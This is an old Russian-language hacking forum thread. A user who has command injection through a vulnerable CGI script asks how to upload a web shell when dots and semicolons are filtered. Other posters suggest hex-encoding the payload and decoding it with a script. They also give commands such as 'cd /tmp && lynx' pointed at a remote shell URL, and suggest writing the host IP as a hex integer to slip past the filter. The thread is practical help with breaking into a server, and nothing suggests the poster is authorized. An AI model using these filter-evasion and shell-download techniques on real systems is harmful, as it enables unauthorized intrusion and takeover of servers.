Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   *nix (https://forum.antichat.xyz/forumdisplay.php?f=43)
-   -   /bin/bash хелп (https://forum.antichat.xyz/showthread.php?t=34667)

guest3297 04.03.2007 17:39

/bin/bash хелп
 
Короче есть бага в cgi скрипте могу исполнять команды но не могу использывать .
Сначало думал что это куйн но потом понял что залить шелл просто не реально.
Да ; тоже нельзя.


Вопрос как залить шелл не используя точки. на серваке есть lynx из загрузчиков.

варианты извменить точку в чего либо (url кодировку не предлогать)

записать эхом в файл без точки в 2 или 16 коде потом утилитой перекодировать и исполнить как .sh

Как реалиховать у вас есть какие то идеи?

hsi 04.03.2007 17:57

Если я все правильно понял (хотя не уверен), то достаточно перевести команду в hex и залить шелл, если есть права на запись.
ha.ckers.org/xss.html

guest3297 04.03.2007 18:01

как перевести в хекс я знаю )
нужна утилита в стандартной поставке котороая могла бы текст в файле (допусти hex) преобраховать в нормальный. короче мне надо залить шелл не используя точки и точки с запятой.

hsi 04.03.2007 18:12

В стандартных утилитах такого, по-моему, нет. Для этого пишутся скрипты на bash или perl. Но его еще нужно туда залить.
www.computing.net/unix/wwwboard/forum/6894.html
Там несколько вариантов скриптов, переводящих hex в ascii.

Deem3n® 04.03.2007 18:32

cd /tmp && lynx <url>
не выход?

guest3297 04.03.2007 18:34

cd /tmp && lynx http://ya.ru/shell
без точек...

hsi 04.03.2007 18:38

А cd /tmp && lynx http://ya%2Eru/shell ?

guest3297 04.03.2007 18:40

нет
Цитата:

варианты извменить точку в чего либо (url кодировку не предлогать)
читаем внимательней.
url приобразовываеться. и в конечном запросе .

Deem3n® 04.03.2007 18:41

Прийдется преобразовывать ип домена ya.ru в что-то вроде 0x34a2462d.
Хз, других идей у меня нет...

guest3297 04.03.2007 18:45

2Deem3n®
так скачаеться????


Время: 17:49